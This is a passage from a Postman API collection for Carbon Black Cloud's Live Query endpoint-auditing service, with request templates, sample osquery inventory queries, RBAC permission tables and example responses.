{\n        \"device.os\": [\n            \"WINDOWS\"\n        ]\n    },\n    \"terms\": {\n        \"fields\": [\n            \"fields.name\"\n        ],\n        \"rows\": 5\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/{{cb_query_id}}/results/_facet"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"terms\": [\n        {\n            \"field\": \"fields.name\",\n            \"values\": [\n                {\n                    \"total\": 2,\n                    \"id\": \"Add-ons Search Detection\",\n                    \"name\": \"Add-ons Search Detection\"\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"7fc3b398-126d-458f-aac2-24ab2443483a"},{"name":"Get Device Summary Facets","id":"a5f4c6ba-4185-4f92-b097-f68a099af7d5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"policy_name\": [\n      \"BERKLY PC Standard\"\n    ]\n  },\n\n  \"terms\": {\n    \"fields\": [\n      \"id\",\n      \"status\",\n      \"policy_name\"\n    ]\n  }\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/{{cb_query_id}}/results/device_summaries/_facet","description":"<p>Get facets for device summaries</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#get-device-summary-facets\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","runs","{{cb_query_id}}","results","device_summaries","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a5f4c6ba-4185-4f92-b097-f68a099af7d5"},{"name":"Get Device Summary From Results","id":"c78b0c36-3d42-4184-9339-abe6555fe972","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"device.id\": [\n            \"<long>\",\n            \"<long>\"\n        ],\n        \"device.name\": [\n            \"<string>\",\n            \"<string>\"\n        ],\n        \"device.os\": [\n            \"<string>\",\n            \"<string>\"\n        ],\n        \"device.policy_id\": [\n            \"<long>\",\n            \"<long>\"\n        ],\n        \"device.policy_name\": [\n            \"<string>\",\n            \"<string>\"\n        ],\n        \"error_description\": [\n            \"<string>\",\n            \"<string>\"\n        ],\n        \"status\": [\n            \"<string>\",\n            \"<string>\"\n        ]\n    },\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        },\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ],\n    \"start\": \"<integer>\"\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/{{cb_query_id}}/results/device_summaries/_search","description":"<p>Gets device summaries from the results of a Live Query run.</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#get-device-summary-from-results\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","runs","{{cb_query_id}}","results","device_summaries","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c78b0c36-3d42-4184-9339-abe6555fe972"},{"name":"Get Query History","id":"72dd7c46-0ad1-45ad-9421-068291e2ae8d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"efuykoprimz74d4ys5ugj5unqfphxpuz\",\n    \"rows\": \"25\",\n    \"sort\": [\n        {\n            \"field\": \"archive_time\",\n            \"order\": \"ASC\"\n        }\n    ],\n    \"start\": \"0\"\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/_search","description":"<p>Get all LiveQuery results for a specific organization.</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#get-query-history\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","runs","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"e19616b4-1a0b-4855-8e61-baa77c489591","name":"Search Previous Query Runs - return only the first record","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"rows\": 1\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"org_key\": \"ABCD1234\",\n    \"num_found\": 20820,\n    \"results\": [\n        {\n            \"org_key\": \"ABCD1234\",\n            \"name\": \"Check installed browser add-ons on daily basis on Windows endpoints\",\n            \"id\": \"nbmfpaiiq6gnmsvlnaf6hyyczj1eaejt\",\n            \"sql\": \"SELECT name, version, path FROM users JOIN firefox_addons USING (uid);\",\n            \"created_by\": \"MQZ6LW8T6K\",\n            \"destinations\": [\n                \"LQ\"\n            ],\n            \"create_time\": \"2022-11-28T14:15:00.000Z\",\n            \"status_update_time\": \"2022-11-28T14:15:00.000Z\",\n            \"timeout_time\": \"2022-11-28T14:17:00.000Z\",\n            \"cancellation_time\": null,\n            \"cancelled_by\": null,\n            \"archive_time\": null,\n            \"archived_by\": null,\n            \"notify_on_finish\": false,\n            \"active_org_devices\": 29,\n            \"status\": \"ACTIVE\",\n            \"device_filter\": {\n                \"policy_id\": null,\n                \"os\": [\n                    \"WINDOWS\"\n                ],\n                \"device_id\": null,\n                \"deployment_type\": null,\n                \"policy_ids\": null,\n                \"device_types\": [\n                    \"WINDOWS\"\n                ],\n                \"device_ids\": null\n            },\n            \"recommended_query_id\": null,\n            \"template_id\": \"zqbkupel7mzwqehuhlkjnwmcj38ezogj\",\n            \"schedule\": {\n                \"status\": \"ACTIVE\",\n                \"recurrence\": \"MINUTELY\",\n                \"timezone\": \"America/New_York\",\n                \"rrule\": \"FREQ=MINUTELY;INTERVAL=15;BYSECOND=0\",\n                \"previous_run_time\": \"2022-11-28T14:15:00.000Z\",\n                \"next_run_time\": \"2022-11-28T14:18:00.000Z\",\n                \"cancellation_time\": null,\n                \"cancelled_by\": null\n            },\n            \"schema\": null,\n            \"last_result_time\": null,\n            \"total_results\": 0,\n            \"not_started_count\": 27,\n            \"match_count\": 0,\n            \"no_match_count\": 0,\n            \"success_count\": 0,\n            \"in_progress_count\": 2,\n            \"error_count\": 0,\n            \"not_supported_count\": 0,\n            \"cancelled_count\": 0\n        }\n    ]\n}"}],"_postman_id":"72dd7c46-0ad1-45ad-9421-068291e2ae8d"}],"id":"bd0cc894-7afb-4360-a96b-5921af814320","_postman_id":"bd0cc894-7afb-4360-a96b-5921af814320","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}}},{"name":"Live Query Template","item":[{"name":"Create Live Query Template","id":"851d3ef5-2700-4048-9e90-b7a90ad1867c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"sql\": \"<string>\",\n    \"device_filter\": {\n      \"device_id\": [\n          \"<long>\",\n          \"<long>\"\n      ],\n      \"os\": [\n          \"<string>\",\n          \"<string>\"\n      ],\n      \"policy_id\": [\n          \"<long>\",\n          \"<long>\"\n      ]\n    },\n    \"name\": \"<string>\",\n    \"notify_on_finish\": \"<boolean>\",\n    \"schedule\": {\n        \"cancellation_time\": \"<string>\",\n        \"cancelled_by\": \"<string>\",\n        \"next_run_time\": \"<string>\",\n        \"previous_run_time\": \"<string>\",\n        \"recurrence\": \"<string>\",\n        \"rrule\": \"<string>\",\n        \"status\": \"<string>\",\n        \"timezone\": \"<string>\"\n    }\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/templates","description":"<p>Creates a Live Query Template.</p>\n<p>This route includes osquery validation:</p>\n<ol>\n<li>Validates the <code>osquery SQL</code>, ensuring tables are correct, table columns match, etc.</li>\n<li>Validates that the <code>osquery SQL</code> is compatible with the selected device type(s).\nDevice compatibility is checked against the osquery schema. The schema version depends upon the device type of the sensor. The following device schemas can be used to query for a specific device:</li>\n</ol>\n<p>WINDOWS: <a href=\"https://osquery.io/schema/3.3.2\">https://osquery.io/schema/3.3.2</a><br />MAC: <a href=\"https://osquery.io/schema/4.1.2\">https://osquery.io/schema/4.1.2</a><br />LINUX: <a href=\"https://osquery.io/schema/4.1.2\">https://osquery.io/schema/4.1.2</a>  </p>\n<p><strong>Note:</strong> Queries will still be allowed to be added when a list of <code>device ids</code> is specified in the filter and none of the corresponding devices are compatible with the query. In these cases, no results will be returned and the query will be shown as <code>NOT_SUPPORTED</code> in the query result device summaries.</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#create-live-query-template\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","templates"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"76b5070c-c66f-4206-8631-bdcee5d9c5cc","name":"Create Live Query Template","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"device_filter\": {\n        \"os\": [\n            \"WINDOWS\"\n        ]\n    },\n    \"name\": \"Example\",\n    \"notify_on_finish\": true,\n    \"schedule\": {\n        \"rrule\": \"RRULE:FREQ=DAILY;BYHOUR=13;BYMINUTE=30;BYSECOND=0\",\n        \"timezone\": \"America/New_York\"\n    },\n    \"sql\": \"SELECT name, VERSION, install_location, install_source, publisher, install_date, uninstall_string FROM programs;\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/templates"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"r9rwnw2bwjyxoxjlqmqzmveixaduzbxz\",\n    \"name\": \"Example\",\n    \"created_by\": \"RW1LQSM3PZ\",\n    \"create_time\": \"2022-11-28T21:32:08.883Z\",\n    \"update_time\": \"2022-11-28T21:32:08.883Z\",\n    \"notify_on_finish\": false,\n    \"device_filter\": {\n        \"policy_id\": null,\n        \"os\": [\n            \"WINDOWS\"\n        ],\n        \"device_id\": null,\n        \"deployment_type\": null,\n        \"policy_ids\": null,\n        \"device_types\": [\n            \"WINDOWS\"\n        ],\n        \"device_ids\": null\n    },\n    \"sql\": \"SELECT name, VERSION, install_location, install_source, publisher, install_date, uninstall_string FROM programs;\",\n    \"last_run_create_time\": null,\n    \"next_run_time\": \"2022-11-29T18:30:00.000Z\",\n    \"schedule\": {\n        \"status\": \"ACTIVE\",\n        \"recurrence\": \"DAILY\",\n        \"timezone\": \"America/New_York\",\n        \"rrule\": \"FREQ=DAILY;BYHOUR=13;BYMINUTE=30;BYSECOND=0\",\n        \"previous_run_time\": null,\n        \"next_run_time\": \"2022-11-29T18:30:00.000Z\",\n        \"cancellation_time\": null,\n        \"cancelled_by\": null\n    },\n    \"recommended_query_id\": null,\n    \"schema\": null,\n    \"destinations\": [\n        \"LQ\"\n    ]\n}"}],"_postman_id":"851d3ef5-2700-4048-9e90-b7a90ad1867c"},{"name":"Search Live Query Templates","id":"7fd3affb-ea39-4b6d-b7a3-5cc31c78d9b2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"recommended_query_id\": [\n            \"<string>\",\n            \"<string>\"\n        ],\n        \"schedule.status\": [\n            \"<string>\",\n            \"<string>\"\n        ]\n    },\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        },\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ],\n    \"start\": \"<integer>\",\n    \"terms\": {\n        \"fields\": [\n            \"<string>\",\n            \"<string>\"\n        ],\n        \"rows\": \"<integer>\"\n    }\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/templates/_search","description":"<p>Get and search for Live Query templates.</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#search-live-query-templates\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","templates","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"7fd3affb-ea39-4b6d-b7a3-5cc31c78d9b2"},{"name":"Retrieve Live Query Template by ID","id":"b4c0b671-c4bf-446e-ae20-e426bfb25611","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/templates/{{cb_template_id}}","description":"<p>Retrieve a Live Query template (i.e. run schedule) by template id.</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#retrieve-live-query-template-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","templates","{{cb_template_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"b4c0b671-c4bf-446e-ae20-e426bfb25611"},{"name":"Edit Live Query Template by ID","id":"9dcad304-a0df-4058-9031-4079afa1dc3a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"create_time\": \"<string>\",\n    \"created_by\": \"<string>\",\n    \"device_filter\": {\n      \"device_id\": [\n          \"<long>\",\n          \"<long>\"\n      ],\n      \"os\": [\n          \"<string>\",\n          \"<string>\"\n      ],\n      \"policy_id\": [\n          \"<long>\",\n          \"<long>\"\n      ]\n    },\n    \"id\": \"<string>\",\n    \"last_run_create_time\": \"<string>\",\n    \"name\": \"<string>\",\n    \"next_run_time\": \"<string>\",\n    \"notify_on_finish\": \"<boolean>\",\n    \"recommended_query_id\": \"<string>\",\n    \"schedule\": {\n        \"cancellation_time\": \"<string>\",\n        \"cancelled_by\": \"<string>\",\n        \"next_run_time\": \"<string>\",\n        \"previous_run_time\": \"<string>\",\n        \"recurrence\": \"<string>\",\n        \"rrule\": \"<string>\",\n        \"status\": \"<string>\",\n        \"timezone\": \"<string>\"\n    },\n    \"sql\": \"<string>\",\n    \"update_time\": \"<string>\"\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/templates/{{cb_template_id}}","description":"<p>Edit a query template (i.e. run schedule).</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#edit-live-query-template-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","templates","{{cb_template_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"9dcad304-a0df-4058-9031-4079afa1dc3a"},{"name":"Delete Query Schedule by ID","id":"a3eac41c-6227-48e4-a15f-96d5d6ba0f7f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/templates/{{cb_template_id}}","description":"<p>Delete a query schedule by id.</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#delete-query-schedule-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","templates","{{cb_template_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a3eac41c-6227-48e4-a15f-96d5d6ba0f7f"}],"id":"dec864f9-c1b7-46a2-8714-a01dfac238c2","_postman_id":"dec864f9-c1b7-46a2-8714-a01dfac238c2","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}}}],"id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","description":"<p>Audit and Remediation is a real-time query and remediation solution that gives teams faster, easier access to audit and change the system state of endpoints across their organization. It contains three components; <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/\">Live Response</a>, <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api\">Live Query</a>, and <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/differential-analysis-api/\">Differential Analysis</a>. This document describes the <strong>Live Query API</strong> - formerly called CB LiveOps.</p>\n<p>With Live Query, you can ask questions of endpoints and quickly identify areas for improving security and IT hygiene by using recommended SQL queries created by Carbon Black security experts or by crafting your own. Live Query is powered by <a href=\"https://osquery.io/\">https://osquery.io</a>, an open-source project that uses an SQLite interface.</p>\n<h2 id=\"key-features\">Key Features</h2>\n<ul>\n<li>Perform SQL queries on endpoints</li>\n<li>Get SQL query recommendations created by Carbon Black security experts</li>\n<li>Use <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#live-query-extension-tables\">Live Query Extension Tables</a> for further insight into the Carbon Black Cloud sensor</li>\n<li>Use Templates to automate your security and IT hygiene further</li>\n<li>Fine-tune automated queries per your specific needs with the broad range of <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#recurrence-rules\">Recurrence Rules</a></li>\n<li><a href=\"https://docs.vmware.com/en/VMware-Carbon-Black-Cloud/services/cbc-audit-and-remediation-oer/GUID-0D926665-B104-4924-B2EE-39EB535C6527.html\">Support for Windows, Mac, and Linux sensors</a></li>\n</ul>\n<h2 id=\"use-cases\">Use Cases</h2>\n<ul>\n<li>IT Hygiene</li>\n<li>Compliance</li>\n<li>Incident Response</li>\n<li>Vulnerability Management</li>\n</ul>\n<p>Further detail is available on the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api\">Developer Network Live Query API page</a>.</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"a93246d0-b7bb-498f-a3e7-f3c9834a9262"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"a8bb29ed-7f99-4639-a8d0-8eae868ebf36"}}],"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3"}],"id":"3af700e4-cf16-4f1e-a5ab-db42beba66bc","description":"<p>Audit and Remediation is a real-time query and remediation solution that gives teams faster, easier access to audit and change the system state of endpoints across their organization.</p>\n<p>By providing administrators with real-time query capabilities from a cloud-native endpoint protection platform, Audit and Remediation enables teams to make quick, confident decisions to improve their security posture. Audit and Remediation closes the gap between security and operations, allowing administrators to perform full investigations and take action to remotely remediate endpoints all from a single solution.</p>\n<p>Audit and Remediation is built on the Carbon Black Cloud, the only cloud-native endpoint protection platform (EPP) that combines on-demand query functionality with advanced prevention, detection, and response.</p>\n","event":[{"listen":"prerequest","script":{"id":"e4023063-ec64-47f1-a816-f535306382da","type":"text/javascript","exec":[""]}},{"listen":"test","script":{"id":"64d8d319-da50-4d8f-8f86-4fd6435faa76","type":"text/javascript","exec":[""]}}],"_postman_id":"3af700e4-cf16-4f1e-a5ab-db42beba66bc","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Containers 🗝","item":[{"name":"Management","item":[{"name":"Policies","item":[{"name":"Get Policy","id":"21cf8936-1336-48da-bff6-93e179fb2f88","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies/{{cb_container_policy_id}}","description":"<p>Get the policy details for the specified policy id.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"scope_metadata\": {\n        \"scope_id\": \"&lt;uuid&gt;\",\n        \"scope_name\": \"&lt;string&gt;\"\n    },\n    \"creator\": \"&lt;string&gt;\",\n    \"policy_id\": \"&lt;uuid&gt;\",\n    \"name\": \"&lt;string&gt;\",\n    \"status\": \"&lt;string&gt;\",\n    \"rules\": [\n        {\n            \"id\": \"&lt;string&gt;\",\n            \"action\": \"&lt;string&gt;\",\n            \"is_enabled\": &lt;boolean&gt;,\n            \"preset_id\": \"&lt;string&gt;\",\n            \"preset_name\": \"&lt;string&gt;\"\n        }\n    ],\n    \"exceptions\": {\n        \"ruleId1\": [\n            {\n                \"name\": \"&lt;string&gt;\",\n                \"username\": \"&lt;string&gt;\",\n                \"labels\": [\n                    {\n                        \"key\": \"&lt;string&gt;\",\n                        \"value\": \"&lt;string&gt;\"\n                    }\n                ]\n            }\n        ]\n    },\n    \"include_init_containers\": &lt;boolean&gt;,\n    \"include_ephemeral_containers\": &lt;boolean&gt;\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","policies","{{cb_container_policy_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[{"id":"cf30b2fa-e567-445a-a01f-6109ec26893e","type":"any","value":"<uuid>","key":"policyId"}]}},"response":[{"id":"b9119c2f-b9f5-46f4-897b-a3e7a8b7a76f","name":"Get Policy","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access 